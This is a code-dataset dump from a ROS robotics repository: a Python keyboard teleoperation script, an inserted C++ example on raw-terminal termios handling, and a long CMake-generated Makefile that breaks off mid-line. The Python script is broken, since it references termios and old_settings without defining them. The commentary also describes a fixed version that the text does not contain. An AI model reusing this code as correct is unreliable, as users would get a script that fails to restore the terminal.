"text": "#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nimport tty\nimport sys\nfrom std_msgs.msg import String\nfrom basic_teleop.msg import *\n\ndef talker():\n fd = sys.stdin.fileno()\n tty.setraw(fd)\n pub = rospy.Publisher('movement', Move, queue_size=10)\n rospy.init_node('director', anonymous=True)\n rate = rospy.Rate(10) # 10hz\n print \"ready to read\"\n while not rospy.is_shutdown():\n key_str = sys.stdin.read(1)\n\ttopic = Move()\n if key_str == 'w':\n\t topic = Move(\"fwd\", 1)\n elif key_str == 's':\n topic = Move(\"bwd\", 1)\n elif key_str == 'a':\n topic = Move(\"ccw\", 1)\n elif key_str == 'd':\n topic = Move(\"cw\", 1)\n elif key_str == 'q':\n\t quit()\n rospy.loginfo(topic)\n pub.publish(topic)\n rate.sleep()\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings)\n\nif __name__ == '__main__':\n try:\n talker()\n except rospy.ROSInterruptException:\n pass\n"
},
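keyop.py above puts the terminal into raw mode through tty.setraw, a thin wrapper over POSIX termios; the essential pattern is save, modify, restore, with the restore reached on every exit path. A sketch of the same pattern in C++ against the same termios API (cfmakeraw is a glibc/BSD extension; on other platforms the flags would need to be cleared by hand):

    // Raw-terminal save/modify/restore, the pattern keyop.py relies on.
    #include <termios.h>
    #include <unistd.h>
    #include <cstdio>

    int main() {
        termios saved;
        tcgetattr(STDIN_FILENO, &saved);   // save current settings first
        termios raw = saved;
        cfmakeraw(&raw);                   // unbuffered input, no echo
        tcsetattr(STDIN_FILENO, TCSADRAIN, &raw);

        char c = 0;
        while (read(STDIN_FILENO, &c, 1) == 1 && c != 'q') {
            std::printf("key: %c\r\n", c); // explicit \r: raw mode disables output CRLF mapping
        }

        tcsetattr(STDIN_FILENO, TCSADRAIN, &saved); // always restore before exiting
        return 0;
    }

Skipping the restore (for example by calling exit from inside the loop, as the original quit() did) leaves the shell in raw mode after the program ends, which is why the fixed script breaks out of the loop instead.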
{
"alpha_fraction": 0.6887755393981934,
"alphanum_fraction": 0.690430223941803,
"avg_line_length": 41.20271682739258,
"blob_id": "3ff7a3d40436496eaca3dea397428ffae4ff6c02",
"content_id": "51ea58b436f686e1d4c52bd561f0d8597d18abc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 43512,
"license_type": "no_license",
"max_line_length": 216,
"num_lines": 1031,
"path": "/build/Makefile",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 2.8\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n.PHONY : default_target\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n# A target that is always out of date.\ncmake_force:\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/will/catkin_ws/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/will/catkin_ws/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running interactive CMake command-line interface...\"\n\t/usr/bin/cmake -i .\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n.PHONY : edit_cache/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n.PHONY : install/local/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n.PHONY : install/strip/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n.PHONY : list_install_components/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : 
rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n.PHONY : test/fast\n\n# The main all target\nall: cmake_check_build_system\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/will/catkin_ws/build/CMakeFiles /home/will/catkin_ws/build/CMakeFiles/progress.marks\n\t$(MAKE) -f CMakeFiles/Makefile2 all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/will/catkin_ws/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\t$(MAKE) -f CMakeFiles/Makefile2 clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\t$(MAKE) -f CMakeFiles/Makefile2 preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\t$(MAKE) -f CMakeFiles/Makefile2 preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\t$(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n#=============================================================================\n# Target rules for targets named clean_test_results\n\n# Build rule for target.\nclean_test_results: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 clean_test_results\n.PHONY : clean_test_results\n\n# fast build rule for target.\nclean_test_results/fast:\n\t$(MAKE) -f CMakeFiles/clean_test_results.dir/build.make CMakeFiles/clean_test_results.dir/build\n.PHONY : clean_test_results/fast\n\n#=============================================================================\n# Target rules for targets named download_extra_data\n\n# Build rule for target.\ndownload_extra_data: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 download_extra_data\n.PHONY : download_extra_data\n\n# fast build rule for target.\ndownload_extra_data/fast:\n\t$(MAKE) -f CMakeFiles/download_extra_data.dir/build.make CMakeFiles/download_extra_data.dir/build\n.PHONY : download_extra_data/fast\n\n#=============================================================================\n# Target rules for targets named doxygen\n\n# Build rule for target.\ndoxygen: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 doxygen\n.PHONY : doxygen\n\n# fast build rule for target.\ndoxygen/fast:\n\t$(MAKE) -f CMakeFiles/doxygen.dir/build.make CMakeFiles/doxygen.dir/build\n.PHONY : doxygen/fast\n\n#=============================================================================\n# Target rules for targets named run_tests\n\n# Build rule for target.\nrun_tests: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 run_tests\n.PHONY : run_tests\n\n# fast build rule for target.\nrun_tests/fast:\n\t$(MAKE) -f CMakeFiles/run_tests.dir/build.make CMakeFiles/run_tests.dir/build\n.PHONY : run_tests/fast\n\n#=============================================================================\n# Target rules for targets named tests\n\n# Build rule for target.\ntests: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 tests\n.PHONY : tests\n\n# fast build rule for target.\ntests/fast:\n\t$(MAKE) -f CMakeFiles/tests.dir/build.make CMakeFiles/tests.dir/build\n.PHONY : tests/fast\n\n#=============================================================================\n# Target 
rules for targets named gtest\n\n# Build rule for target.\ngtest: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 gtest\n.PHONY : gtest\n\n# fast build rule for target.\ngtest/fast:\n\t$(MAKE) -f gtest/CMakeFiles/gtest.dir/build.make gtest/CMakeFiles/gtest.dir/build\n.PHONY : gtest/fast\n\n#=============================================================================\n# Target rules for targets named gtest_main\n\n# Build rule for target.\ngtest_main: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 gtest_main\n.PHONY : gtest_main\n\n# fast build rule for target.\ngtest_main/fast:\n\t$(MAKE) -f gtest/CMakeFiles/gtest_main.dir/build.make gtest/CMakeFiles/gtest_main.dir/build\n.PHONY : gtest_main/fast\n\n#=============================================================================\n# Target rules for targets named _basic_teleop_generate_messages_check_deps_Move\n\n# Build rule for target.\n_basic_teleop_generate_messages_check_deps_Move: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 _basic_teleop_generate_messages_check_deps_Move\n.PHONY : _basic_teleop_generate_messages_check_deps_Move\n\n# fast build rule for target.\n_basic_teleop_generate_messages_check_deps_Move/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/_basic_teleop_generate_messages_check_deps_Move.dir/build.make basic_teleop/CMakeFiles/_basic_teleop_generate_messages_check_deps_Move.dir/build\n.PHONY : _basic_teleop_generate_messages_check_deps_Move/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_gencpp\n\n# Build rule for target.\nbasic_teleop_gencpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_gencpp\n.PHONY : basic_teleop_gencpp\n\n# fast build rule for target.\nbasic_teleop_gencpp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_gencpp.dir/build.make basic_teleop/CMakeFiles/basic_teleop_gencpp.dir/build\n.PHONY : basic_teleop_gencpp/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_generate_messages\n\n# Build rule for target.\nbasic_teleop_generate_messages: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_generate_messages\n.PHONY : basic_teleop_generate_messages\n\n# fast build rule for target.\nbasic_teleop_generate_messages/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_generate_messages.dir/build.make basic_teleop/CMakeFiles/basic_teleop_generate_messages.dir/build\n.PHONY : basic_teleop_generate_messages/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_generate_messages_cpp\n\n# Build rule for target.\nbasic_teleop_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_generate_messages_cpp\n.PHONY : basic_teleop_generate_messages_cpp\n\n# fast build rule for target.\nbasic_teleop_generate_messages_cpp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_generate_messages_cpp.dir/build.make basic_teleop/CMakeFiles/basic_teleop_generate_messages_cpp.dir/build\n.PHONY : basic_teleop_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_generate_messages_eus\n\n# Build rule for target.\nbasic_teleop_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_generate_messages_eus\n.PHONY 
: basic_teleop_generate_messages_eus\n\n# fast build rule for target.\nbasic_teleop_generate_messages_eus/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_generate_messages_eus.dir/build.make basic_teleop/CMakeFiles/basic_teleop_generate_messages_eus.dir/build\n.PHONY : basic_teleop_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_generate_messages_lisp\n\n# Build rule for target.\nbasic_teleop_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_generate_messages_lisp\n.PHONY : basic_teleop_generate_messages_lisp\n\n# fast build rule for target.\nbasic_teleop_generate_messages_lisp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_generate_messages_lisp.dir/build.make basic_teleop/CMakeFiles/basic_teleop_generate_messages_lisp.dir/build\n.PHONY : basic_teleop_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_generate_messages_py\n\n# Build rule for target.\nbasic_teleop_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_generate_messages_py\n.PHONY : basic_teleop_generate_messages_py\n\n# fast build rule for target.\nbasic_teleop_generate_messages_py/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_generate_messages_py.dir/build.make basic_teleop/CMakeFiles/basic_teleop_generate_messages_py.dir/build\n.PHONY : basic_teleop_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_geneus\n\n# Build rule for target.\nbasic_teleop_geneus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_geneus\n.PHONY : basic_teleop_geneus\n\n# fast build rule for target.\nbasic_teleop_geneus/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_geneus.dir/build.make basic_teleop/CMakeFiles/basic_teleop_geneus.dir/build\n.PHONY : basic_teleop_geneus/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_genlisp\n\n# Build rule for target.\nbasic_teleop_genlisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_genlisp\n.PHONY : basic_teleop_genlisp\n\n# fast build rule for target.\nbasic_teleop_genlisp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_genlisp.dir/build.make basic_teleop/CMakeFiles/basic_teleop_genlisp.dir/build\n.PHONY : basic_teleop_genlisp/fast\n\n#=============================================================================\n# Target rules for targets named basic_teleop_genpy\n\n# Build rule for target.\nbasic_teleop_genpy: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 basic_teleop_genpy\n.PHONY : basic_teleop_genpy\n\n# fast build rule for target.\nbasic_teleop_genpy/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/basic_teleop_genpy.dir/build.make basic_teleop/CMakeFiles/basic_teleop_genpy.dir/build\n.PHONY : basic_teleop_genpy/fast\n\n#=============================================================================\n# Target rules for targets named depth_stream_stabilizer\n\n# Build rule for target.\ndepth_stream_stabilizer: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 depth_stream_stabilizer\n.PHONY : depth_stream_stabilizer\n\n# fast build rule for target.\ndepth_stream_stabilizer/fast:\n\t$(MAKE) -f 
basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/build.make basic_teleop/CMakeFiles/depth_stream_stabilizer.dir/build\n.PHONY : depth_stream_stabilizer/fast\n\n#=============================================================================\n# Target rules for targets named geometry_msgs_generate_messages_cpp\n\n# Build rule for target.\ngeometry_msgs_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 geometry_msgs_generate_messages_cpp\n.PHONY : geometry_msgs_generate_messages_cpp\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_cpp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/build.make basic_teleop/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/build\n.PHONY : geometry_msgs_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named geometry_msgs_generate_messages_eus\n\n# Build rule for target.\ngeometry_msgs_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 geometry_msgs_generate_messages_eus\n.PHONY : geometry_msgs_generate_messages_eus\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_eus/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/geometry_msgs_generate_messages_eus.dir/build.make basic_teleop/CMakeFiles/geometry_msgs_generate_messages_eus.dir/build\n.PHONY : geometry_msgs_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named geometry_msgs_generate_messages_lisp\n\n# Build rule for target.\ngeometry_msgs_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 geometry_msgs_generate_messages_lisp\n.PHONY : geometry_msgs_generate_messages_lisp\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_lisp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/build.make basic_teleop/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/build\n.PHONY : geometry_msgs_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named geometry_msgs_generate_messages_py\n\n# Build rule for target.\ngeometry_msgs_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 geometry_msgs_generate_messages_py\n.PHONY : geometry_msgs_generate_messages_py\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_py/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/geometry_msgs_generate_messages_py.dir/build.make basic_teleop/CMakeFiles/geometry_msgs_generate_messages_py.dir/build\n.PHONY : geometry_msgs_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named predictive_director\n\n# Build rule for target.\npredictive_director: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 predictive_director\n.PHONY : predictive_director\n\n# fast build rule for target.\npredictive_director/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/predictive_director.dir/build.make basic_teleop/CMakeFiles/predictive_director.dir/build\n.PHONY : predictive_director/fast\n\n#=============================================================================\n# Target rules for targets named roscpp_generate_messages_cpp\n\n# Build rule for target.\nroscpp_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 
roscpp_generate_messages_cpp\n.PHONY : roscpp_generate_messages_cpp\n\n# fast build rule for target.\nroscpp_generate_messages_cpp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/roscpp_generate_messages_cpp.dir/build.make basic_teleop/CMakeFiles/roscpp_generate_messages_cpp.dir/build\n.PHONY : roscpp_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named roscpp_generate_messages_eus\n\n# Build rule for target.\nroscpp_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 roscpp_generate_messages_eus\n.PHONY : roscpp_generate_messages_eus\n\n# fast build rule for target.\nroscpp_generate_messages_eus/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/roscpp_generate_messages_eus.dir/build.make basic_teleop/CMakeFiles/roscpp_generate_messages_eus.dir/build\n.PHONY : roscpp_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named roscpp_generate_messages_lisp\n\n# Build rule for target.\nroscpp_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 roscpp_generate_messages_lisp\n.PHONY : roscpp_generate_messages_lisp\n\n# fast build rule for target.\nroscpp_generate_messages_lisp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/roscpp_generate_messages_lisp.dir/build.make basic_teleop/CMakeFiles/roscpp_generate_messages_lisp.dir/build\n.PHONY : roscpp_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named roscpp_generate_messages_py\n\n# Build rule for target.\nroscpp_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 roscpp_generate_messages_py\n.PHONY : roscpp_generate_messages_py\n\n# fast build rule for target.\nroscpp_generate_messages_py/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/roscpp_generate_messages_py.dir/build.make basic_teleop/CMakeFiles/roscpp_generate_messages_py.dir/build\n.PHONY : roscpp_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_cpp\n\n# Build rule for target.\nrosgraph_msgs_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_cpp\n.PHONY : rosgraph_msgs_generate_messages_cpp\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_cpp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/rosgraph_msgs_generate_messages_cpp.dir/build.make basic_teleop/CMakeFiles/rosgraph_msgs_generate_messages_cpp.dir/build\n.PHONY : rosgraph_msgs_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_eus\n\n# Build rule for target.\nrosgraph_msgs_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_eus\n.PHONY : rosgraph_msgs_generate_messages_eus\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_eus/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/rosgraph_msgs_generate_messages_eus.dir/build.make basic_teleop/CMakeFiles/rosgraph_msgs_generate_messages_eus.dir/build\n.PHONY : rosgraph_msgs_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_lisp\n\n# Build 
rule for target.\nrosgraph_msgs_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_lisp\n.PHONY : rosgraph_msgs_generate_messages_lisp\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_lisp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/rosgraph_msgs_generate_messages_lisp.dir/build.make basic_teleop/CMakeFiles/rosgraph_msgs_generate_messages_lisp.dir/build\n.PHONY : rosgraph_msgs_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named rosgraph_msgs_generate_messages_py\n\n# Build rule for target.\nrosgraph_msgs_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 rosgraph_msgs_generate_messages_py\n.PHONY : rosgraph_msgs_generate_messages_py\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_py/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/rosgraph_msgs_generate_messages_py.dir/build.make basic_teleop/CMakeFiles/rosgraph_msgs_generate_messages_py.dir/build\n.PHONY : rosgraph_msgs_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named sensor_msgs_generate_messages_cpp\n\n# Build rule for target.\nsensor_msgs_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 sensor_msgs_generate_messages_cpp\n.PHONY : sensor_msgs_generate_messages_cpp\n\n# fast build rule for target.\nsensor_msgs_generate_messages_cpp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/sensor_msgs_generate_messages_cpp.dir/build.make basic_teleop/CMakeFiles/sensor_msgs_generate_messages_cpp.dir/build\n.PHONY : sensor_msgs_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named sensor_msgs_generate_messages_eus\n\n# Build rule for target.\nsensor_msgs_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 sensor_msgs_generate_messages_eus\n.PHONY : sensor_msgs_generate_messages_eus\n\n# fast build rule for target.\nsensor_msgs_generate_messages_eus/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/sensor_msgs_generate_messages_eus.dir/build.make basic_teleop/CMakeFiles/sensor_msgs_generate_messages_eus.dir/build\n.PHONY : sensor_msgs_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named sensor_msgs_generate_messages_lisp\n\n# Build rule for target.\nsensor_msgs_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 sensor_msgs_generate_messages_lisp\n.PHONY : sensor_msgs_generate_messages_lisp\n\n# fast build rule for target.\nsensor_msgs_generate_messages_lisp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/sensor_msgs_generate_messages_lisp.dir/build.make basic_teleop/CMakeFiles/sensor_msgs_generate_messages_lisp.dir/build\n.PHONY : sensor_msgs_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named sensor_msgs_generate_messages_py\n\n# Build rule for target.\nsensor_msgs_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 sensor_msgs_generate_messages_py\n.PHONY : sensor_msgs_generate_messages_py\n\n# fast build rule for target.\nsensor_msgs_generate_messages_py/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/sensor_msgs_generate_messages_py.dir/build.make 
basic_teleop/CMakeFiles/sensor_msgs_generate_messages_py.dir/build\n.PHONY : sensor_msgs_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named std_msgs_generate_messages_cpp\n\n# Build rule for target.\nstd_msgs_generate_messages_cpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 std_msgs_generate_messages_cpp\n.PHONY : std_msgs_generate_messages_cpp\n\n# fast build rule for target.\nstd_msgs_generate_messages_cpp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/std_msgs_generate_messages_cpp.dir/build.make basic_teleop/CMakeFiles/std_msgs_generate_messages_cpp.dir/build\n.PHONY : std_msgs_generate_messages_cpp/fast\n\n#=============================================================================\n# Target rules for targets named std_msgs_generate_messages_eus\n\n# Build rule for target.\nstd_msgs_generate_messages_eus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 std_msgs_generate_messages_eus\n.PHONY : std_msgs_generate_messages_eus\n\n# fast build rule for target.\nstd_msgs_generate_messages_eus/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/std_msgs_generate_messages_eus.dir/build.make basic_teleop/CMakeFiles/std_msgs_generate_messages_eus.dir/build\n.PHONY : std_msgs_generate_messages_eus/fast\n\n#=============================================================================\n# Target rules for targets named std_msgs_generate_messages_lisp\n\n# Build rule for target.\nstd_msgs_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 std_msgs_generate_messages_lisp\n.PHONY : std_msgs_generate_messages_lisp\n\n# fast build rule for target.\nstd_msgs_generate_messages_lisp/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/std_msgs_generate_messages_lisp.dir/build.make basic_teleop/CMakeFiles/std_msgs_generate_messages_lisp.dir/build\n.PHONY : std_msgs_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named std_msgs_generate_messages_py\n\n# Build rule for target.\nstd_msgs_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 std_msgs_generate_messages_py\n.PHONY : std_msgs_generate_messages_py\n\n# fast build rule for target.\nstd_msgs_generate_messages_py/fast:\n\t$(MAKE) -f basic_teleop/CMakeFiles/std_msgs_generate_messages_py.dir/build.make basic_teleop/CMakeFiles/std_msgs_generate_messages_py.dir/build\n.PHONY : std_msgs_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named _beginner_tutorials_generate_messages_check_deps_AddTwoInts\n\n# Build rule for target.\n_beginner_tutorials_generate_messages_check_deps_AddTwoInts: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 _beginner_tutorials_generate_messages_check_deps_AddTwoInts\n.PHONY : _beginner_tutorials_generate_messages_check_deps_AddTwoInts\n\n# fast build rule for target.\n_beginner_tutorials_generate_messages_check_deps_AddTwoInts/fast:\n\t$(MAKE) -f beginner_tutorials/CMakeFiles/_beginner_tutorials_generate_messages_check_deps_AddTwoInts.dir/build.make beginner_tutorials/CMakeFiles/_beginner_tutorials_generate_messages_check_deps_AddTwoInts.dir/build\n.PHONY : _beginner_tutorials_generate_messages_check_deps_AddTwoInts/fast\n\n#=============================================================================\n# Target rules for targets named 
_beginner_tutorials_generate_messages_check_deps_Num\n\n# Build rule for target.\n_beginner_tutorials_generate_messages_check_deps_Num: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 _beginner_tutorials_generate_messages_check_deps_Num\n.PHONY : _beginner_tutorials_generate_messages_check_deps_Num\n\n# fast build rule for target.\n_beginner_tutorials_generate_messages_check_deps_Num/fast:\n\t$(MAKE) -f beginner_tutorials/CMakeFiles/_beginner_tutorials_generate_messages_check_deps_Num.dir/build.make beginner_tutorials/CMakeFiles/_beginner_tutorials_generate_messages_check_deps_Num.dir/build\n.PHONY : _beginner_tutorials_generate_messages_check_deps_Num/fast\n\n#=============================================================================\n# Target rules for targets named beginner_tutorials_gencpp\n\n# Build rule for target.\nbeginner_tutorials_gencpp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 beginner_tutorials_gencpp\n.PHONY : beginner_tutorials_gencpp\n\n# fast build rule for target.\nbeginner_tutorials_gencpp/fast:\n\t$(MAKE) -f 